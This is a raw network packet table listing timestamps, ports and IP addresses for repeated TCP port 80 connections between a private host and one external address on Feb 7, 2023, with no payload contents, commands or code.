Feb 7, 2023 19:59:22.143944025 CET	80	50203	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:22.144067049 CET	50203	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:22.285828114 CET	50203	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:22.286731005 CET	50204	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:22.347364902 CET	80	50203	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:22.347457886 CET	50203	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:22.347939014 CET	80	50204	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:22.348025084 CET	50204	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:22.348680019 CET	50204	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:22.410026073 CET	80	50204	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:22.412312031 CET	80	50204	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:22.412422895 CET	50204	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:23.205595970 CET	50204	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:23.206892967 CET	50205	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:23.267127991 CET	80	50204	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:23.267236948 CET	50204	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:23.269383907 CET	80	50205	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:23.269499063 CET	50205	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:23.312321901 CET	50205	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:23.375010014 CET	80	50205	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:23.378950119 CET	80	50205	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:23.379062891 CET	50205	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:23.533572912 CET	50205	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:23.534235001 CET	50206	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:23.595923901 CET	80	50206	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:23.596075058 CET	50206	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:23.596286058 CET	80	50205	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:23.596368074 CET	50205	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:23.596824884 CET	50206	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:23.658454895 CET	80	50206	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:23.660908937 CET	80	50206	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:23.661051035 CET	50206	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:24.891865015 CET	50206	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:24.892798901 CET	50207	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:24.953718901 CET	80	50206	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:24.953883886 CET	50206	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:24.955194950 CET	80	50207	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:24.955369949 CET	50207	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:25.359503031 CET	50207	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:25.422112942 CET	80	50207	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:25.428631067 CET	80	50207	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:25.428726912 CET	50207	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:25.612421036 CET	50207	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:25.613050938 CET	50208	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:25.674933910 CET	80	50207	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:25.675055027 CET	50207	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:25.675266027 CET	80	50208	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:25.675364971 CET	50208	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:25.676245928 CET	50208	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:25.738533020 CET	80	50208	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:25.740968943 CET	80	50208	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:25.741045952 CET	50208	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:25.861637115 CET	50208	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:25.862521887 CET	50209	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:25.924132109 CET	80	50208	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:25.924212933 CET	50208	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:25.924993038 CET	80	50209	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:25.925108910 CET	50209	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:25.926204920 CET	50209	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:25.988873005 CET	80	50209	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:25.991401911 CET	80	50209	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:25.991508007 CET	50209	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.106060028 CET	50209	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.106739044 CET	50210	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.168725014 CET	80	50209	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:26.168869972 CET	50209	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.169116974 CET	80	50210	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:26.169225931 CET	50210	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.169612885 CET	50210	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.232157946 CET	80	50210	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:26.235832930 CET	80	50210	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:26.236011982 CET	50210	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.351427078 CET	50210	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.352144957 CET	50211	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.414036989 CET	80	50210	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:26.414258003 CET	50210	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.414364100 CET	80	50211	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:26.414498091 CET	50211	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.414967060 CET	50211	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.477317095 CET	80	50211	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:26.480029106 CET	80	50211	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:26.480170965 CET	50211	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.590711117 CET	50211	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.591403008 CET	50212	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.655699015 CET	80	50211	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:26.655868053 CET	50211	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.656074047 CET	80	50212	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:26.656197071 CET	50212	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.656554937 CET	50212	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.721254110 CET	80	50212	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:26.723640919 CET	80	50212	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:26.723754883 CET	50212	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.841609955 CET	50212	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.842777014 CET	50213	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.903907061 CET	80	50212	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:26.904093027 CET	50212	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.904144049 CET	80	50213	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:26.904247046 CET	50213	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.928061962 CET	50213	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:26.989645958 CET	80	50213	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:26.992341995 CET	80	50213	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:26.992640972 CET	50213	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.106733084 CET	50213	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.107712030 CET	50214	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.168446064 CET	80	50213	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:27.168540001 CET	50213	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.168925047 CET	80	50214	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:27.169133902 CET	50214	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.169596910 CET	50214	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.230954885 CET	80	50214	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:27.234812975 CET	80	50214	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:27.234989882 CET	50214	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.340325117 CET	50214	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.341015100 CET	50215	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.401691914 CET	80	50215	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:27.401736021 CET	80	50214	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:27.401953936 CET	50214	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.402725935 CET	50215	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.402725935 CET	50215	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.463306904 CET	80	50215	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:27.466136932 CET	80	50215	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:27.466371059 CET	50215	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.581573009 CET	50215	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.582525969 CET	50216	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.643011093 CET	80	50215	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:27.643197060 CET	50215	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.644098997 CET	80	50216	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:27.644273996 CET	50216	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.644778967 CET	50216	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.706267118 CET	80	50216	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:27.708693027 CET	80	50216	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:27.708862066 CET	50216	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.827065945 CET	50216	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.827740908 CET	50217	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.888999939 CET	80	50216	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:27.889120102 CET	50216	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.889236927 CET	80	50217	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:27.889323950 CET	50217	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.889672995 CET	50217	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:27.951160908 CET	80	50217	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:27.954425097 CET	80	50217	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:27.954638958 CET	50217	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.060415983 CET	50217	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.080773115 CET	50218	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.122183084 CET	80	50217	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:28.122318983 CET	50217	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.142278910 CET	80	50218	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:28.142400980 CET	50218	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.144912004 CET	50218	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.206969023 CET	80	50218	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:28.210578918 CET	80	50218	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:28.210835934 CET	50218	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.333590984 CET	50218	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.334615946 CET	50219	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.395426035 CET	80	50218	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:28.395545959 CET	50218	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.397766113 CET	80	50219	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:28.397859097 CET	50219	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.398283958 CET	50219	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.460899115 CET	80	50219	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:28.463226080 CET	80	50219	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:28.463361979 CET	50219	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.574811935 CET	50219	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.575613976 CET	50220	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.637661934 CET	80	50220	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:28.637717009 CET	80	50219	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:28.637813091 CET	50219	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.638484001 CET	50220	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.638484001 CET	50220	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.701076031 CET	80	50220	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:28.703393936 CET	80	50220	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:28.703516006 CET	50220	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.809798002 CET	50220	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.810575008 CET	50221	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.870114088 CET	80	50221	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:28.870223045 CET	50221	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.870563030 CET	50221	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.871330023 CET	80	50220	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:28.871400118 CET	50220	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:28.929775000 CET	80	50221	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:28.932578087 CET	80	50221	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:28.932682991 CET	50221	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.044428110 CET	50221	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.045089960 CET	50222	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.103878021 CET	80	50221	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:29.104090929 CET	50221	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.104717016 CET	80	50222	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:29.104873896 CET	50222	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.105694056 CET	50222	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.164921045 CET	80	50222	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:29.168239117 CET	80	50222	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:29.170243025 CET	50222	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.281162977 CET	50222	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.282068968 CET	50223	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.340580940 CET	80	50222	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:29.340786934 CET	50222	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.341620922 CET	80	50223	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:29.341749907 CET	50223	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.342199087 CET	50223	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.401616096 CET	80	50223	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:29.403978109 CET	80	50223	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:29.404103041 CET	50223	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.513379097 CET	50223	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.514322042 CET	50224	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.576955080 CET	80	50223	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:29.576999903 CET	80	50224	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:29.577126026 CET	50223	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.577183008 CET	50224	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.577696085 CET	50224	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.640221119 CET	80	50224	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:29.642642975 CET	80	50224	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:29.646857977 CET	50224	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.765151978 CET	50224	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.765902042 CET	50225	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.826679945 CET	80	50225	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:29.828398943 CET	80	50224	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:29.828596115 CET	50224	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.829004049 CET	50225	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.829004049 CET	50225	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.889081955 CET	80	50225	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:29.891496897 CET	80	50225	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:29.891716957 CET	50225	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.997095108 CET	50225	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:29.998172045 CET	50226	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.057423115 CET	80	50225	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.057591915 CET	50225	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.059683084 CET	80	50226	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.062448978 CET	50226	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.062963963 CET	50226	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.124454021 CET	80	50226	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.128540039 CET	80	50226	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.128710985 CET	50226	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.236366034 CET	50226	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.237262011 CET	50227	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.296721935 CET	80	50227	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.297276974 CET	50227	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.297316074 CET	50227	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.297755957 CET	80	50226	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.299478054 CET	50226	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.358668089 CET	80	50227	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.360502958 CET	80	50227	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.360722065 CET	50227	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.466459990 CET	50227	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.467797041 CET	50228	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.525962114 CET	80	50227	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.526165009 CET	50227	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.530507088 CET	80	50228	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.530746937 CET	50228	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.531227112 CET	50228	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.593872070 CET	80	50228	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.596160889 CET	80	50228	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.596350908 CET	50228	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.700294018 CET	50228	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.700983047 CET	50229	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.760628939 CET	80	50229	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.760867119 CET	50229	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.761202097 CET	50229	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.762897968 CET	80	50228	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.763039112 CET	50228	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.820481062 CET	80	50229	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.822582960 CET	80	50229	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.822762012 CET	50229	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.934885025 CET	50229	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.935600996 CET	50230	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.994303942 CET	80	50229	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.994477034 CET	50229	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.996167898 CET	80	50230	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:30.996335983 CET	50230	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:30.997466087 CET	50230	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.058135033 CET	80	50230	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:31.061772108 CET	80	50230	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:31.061899900 CET	50230	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.168854952 CET	50230	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.169511080 CET	50231	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.229712009 CET	80	50230	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:31.229830027 CET	50230	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.230408907 CET	80	50231	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:31.230587959 CET	50231	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.231344938 CET	50231	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.291906118 CET	80	50231	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:31.294409037 CET	80	50231	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:31.294537067 CET	50231	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.403558969 CET	50231	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.404349089 CET	50232	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.464251041 CET	80	50231	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:31.464387894 CET	50231	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.466923952 CET	80	50232	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:31.467031956 CET	50232	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.467525005 CET	50232	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.535085917 CET	80	50232	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:31.537295103 CET	80	50232	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:31.537430048 CET	50232	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.654850006 CET	50232	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.655683994 CET	50233	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.715137959 CET	80	50232	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:31.715272903 CET	50232	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.718066931 CET	80	50233	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:31.718177080 CET	50233	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.718708038 CET	50233	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.781018972 CET	80	50233	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:31.783266068 CET	80	50233	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:31.783371925 CET	50233	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.888078928 CET	50233	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.888982058 CET	50234	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.950665951 CET	80	50234	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:31.950747013 CET	80	50233	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:31.950875998 CET	50234	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.950877905 CET	50233	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:31.956331968 CET	50234	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.017602921 CET	80	50234	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:32.019738913 CET	80	50234	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:32.019794941 CET	50234	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.122586966 CET	50234	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.123251915 CET	50235	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.183983088 CET	80	50234	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:32.184108019 CET	50234	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.184663057 CET	80	50235	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:32.184747934 CET	50235	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.185122013 CET	50235	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.247091055 CET	80	50235	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:32.251034021 CET	80	50235	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:32.251131058 CET	50235	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.376111984 CET	50235	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.377064943 CET	50236	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.437602043 CET	80	50235	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:32.437762976 CET	50235	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.439385891 CET	80	50236	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:32.439558029 CET	50236	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.439969063 CET	50236	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.502469063 CET	80	50236	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:32.504637957 CET	80	50236	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:32.506412029 CET	50236	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.627187014 CET	50236	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.628000021 CET	50237	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.690035105 CET	80	50236	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:32.690273046 CET	80	50237	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:32.690448046 CET	50236	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.690476894 CET	50237	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.701920986 CET	50237	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.764374018 CET	80	50237	62.204.41.4	192.168.2.5
